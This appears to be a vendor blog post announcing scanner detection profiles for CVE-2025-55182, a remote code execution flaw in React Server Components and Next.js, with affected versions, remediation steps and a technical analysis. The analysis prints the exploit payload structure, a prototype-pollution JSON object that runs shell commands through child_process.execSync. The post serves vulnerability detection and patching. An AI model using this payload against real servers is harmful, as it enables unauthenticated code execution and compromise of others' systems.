CVE-2025-55182: New Detection Profiles for Burp Bounty Pro

CVE-2025-55182: New Detection Profiles for Burp Bounty Pro
CVE-2025-55182 (React2Shell): New Detection Profiles for Burp Bounty Pro
🔴 CVSS 10.0 Critical

CVE-2025-55182 (React2Shell):
New Detection Profiles for Burp Bounty Pro

Executive Summary

We have released three new detection profiles for CVE-2025-55182, a critical Remote Code Execution vulnerability affecting React Server Components and Next.js applications. With a CVSS score of 10.0 and active exploitation in the wild, this vulnerability poses an immediate threat to millions of web applications worldwide.

🔄 How to Get These Profiles

  1. Open Burp Suite
  2. Go to ExtensionsBurp Bounty Pro
  3. Navigate to the About tab
  4. Click "Check For Updates"

The new profiles will be downloaded and imported automatically.

What is React2Shell?

CVE-2025-55182, dubbed "React2Shell" by security researchers, is an unsafe deserialization vulnerability in the React Server Components (RSC) Flight protocol. Discovered by Lachlan Davidson from Assetnote on December 3, 2025, this vulnerability allows unauthenticated attackers to achieve remote code execution on affected servers.

Key Facts

Attribute Value
CVE ID CVE-2025-55182
CVSS Score 10.0 (Critical)
CWE CWE-502 (Deserialization of Untrusted Data)
CISA KEV Added December 5, 2025
Remediation Deadline December 19, 2025
Authentication Required None
Exploit Complexity Low

Affected Versions

❌ Vulnerable

React:
19.0.0, 19.1.0, 19.1.1, 19.2.0

Next.js:
15.0.4 through 16.0.6

✅ Patched

React:
19.0.1, 19.1.2, 19.2.1

Next.js:
15.1.9, 15.2.6, 15.3.6, 15.4.8, 15.5.7, 16.0.7

Active Exploitation

⚠️ Active Exploitation in the Wild

Within hours of public disclosure, threat actors began actively exploiting this vulnerability. CISA added CVE-2025-55182 to the Known Exploited Vulnerabilities (KEV) catalog on December 5, 2025.

Observed threat actors include:

  • Chinese APT groups (Earth Lamia, Jackpot Panda)
  • Cryptomining operations
  • Cobalt Strike deployment campaigns

The ease of exploitation (single HTTP request, no authentication) combined with the widespread adoption of Next.js makes this vulnerability particularly dangerous.

Technical Analysis

The Vulnerability

React Server Components use a protocol called "Flight" to serialize and transmit component trees between server and client. The vulnerability exists in how the Flight protocol deserializes incoming data from HTTP requests.

The exploit chain works as follows:

  1. Attacker sends a POST request with malicious multipart form data
  2. The payload uses JavaScript prototype pollution via __proto__ to manipulate object behavior
  3. The polluted prototype chain allows access to process.mainModule
  4. Code execution is achieved through require('child_process').execSync()

Exploit Payload Structure

{
  "then": "$1:__proto__:then",
  "status": "resolved_model",
  "reason": -1,
  "value": "{\"then\":\"$B1337\"}",
  "_response": {
    "_prefix": "var res=process.mainModule.require('child_process')
               .execSync('COMMAND').toString().trim();;
               throw Object.assign(new Error('NEXT_REDIRECT'),
               {digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});",
    "_chunks": "$Q2",
    "_formData": {
      "get": "$1:constructor:constructor"
    }
  }
}

The exploit abuses the Flight protocol's reference system ($1:__proto__:then) to achieve prototype pollution, then leverages JavaScript's prototype chain to gain code execution.

New Burp Bounty Pro Profiles

We have developed three detection profiles to cover different scanning scenarios:

CVE-2025-55182_React2Shell_RCE

Active Scan

Detection Method: Mathematical Proof of Concept

This profile sends a payload that executes echo $((31337*31337)) on the target server. If vulnerable, the response will contain 982013569 in the x-action-redirect header, confirming code execution without causing harm.

Indicators: HTTP 303 + header x-action-redirect contains 982013569

CVE-2025-55182_React2Shell_RCE_OOB

Active Scan + Collaborator

Detection Method: Out-of-Band DNS/HTTP callback

For environments where response-based detection is not possible (WAF filtering, async processing), this profile uses Burp Collaborator to confirm code execution via DNS lookup.

Indicators: DNS or HTTP interaction received by Burp Collaborator

CVE-2025-55182_React2Shell_RCE_Windows

Active Scan

Detection Method: PowerShell Mathematical Proof

For Windows-based Node.js deployments, this profile uses PowerShell to perform the mathematical calculation: powershell -c "31337*31337".

Indicators: HTTP 303 + header x-action-redirect contains 982013569

Scanning Recommendations

Immediate Actions

  1. Update your profiles using the built-in update mechanism
  2. Scan all Next.js applications in your scope
  3. Prioritize internet-facing applications - these are most at risk
  4. Check for indicators of compromise if vulnerabilities are found

Detection Strategy

We recommend using the profiles in the following order:

  1. Start with CVE-2025-55182_React2Shell_RCE - fastest detection method
  2. Use OOB profile if standard detection fails (WAF bypass, blind environments)
  3. Use Windows profile for Windows Server deployments
✅ Low False Positive Rate

These profiles have a very low false positive rate because detection requires exact mathematical results (982013569) or actual Collaborator callbacks. The exploit mechanism is specific to vulnerable React/Flight versions.

Remediation Guidance

If You Discover Vulnerable Applications

🔧 Immediate Steps
  • Patch immediately - Update to the fixed versions listed above
  • Enable WAF protection:
    • AWS WAF: Enable AWSManagedRulesKnownBadInputsRuleSet v1.24+
    • Cloudflare: Protection is auto-enabled
  • Monitor for exploitation - Check logs for POST requests with Next-Action header

Post-Incident Actions

If exploitation is suspected:

  • Rotate all secrets, API keys, and credentials
  • Check for web shells and backdoors
  • Review server logs for suspicious activity
  • Conduct forensic analysis
  • Report to your security team

References

Conclusion

CVE-2025-55182 represents a critical threat to the React/Next.js ecosystem. With active exploitation ongoing and a CISA remediation deadline of December 19, 2025, immediate action is required.

Update your Burp Bounty Pro profiles today and scan your targets before attackers do.

Stay safe. Hack responsibly. 🛡️

Have questions or feedback? Contact us or open an issue on our GitHub repository.

© 2025 Burp Bounty Pro. All rights reserved.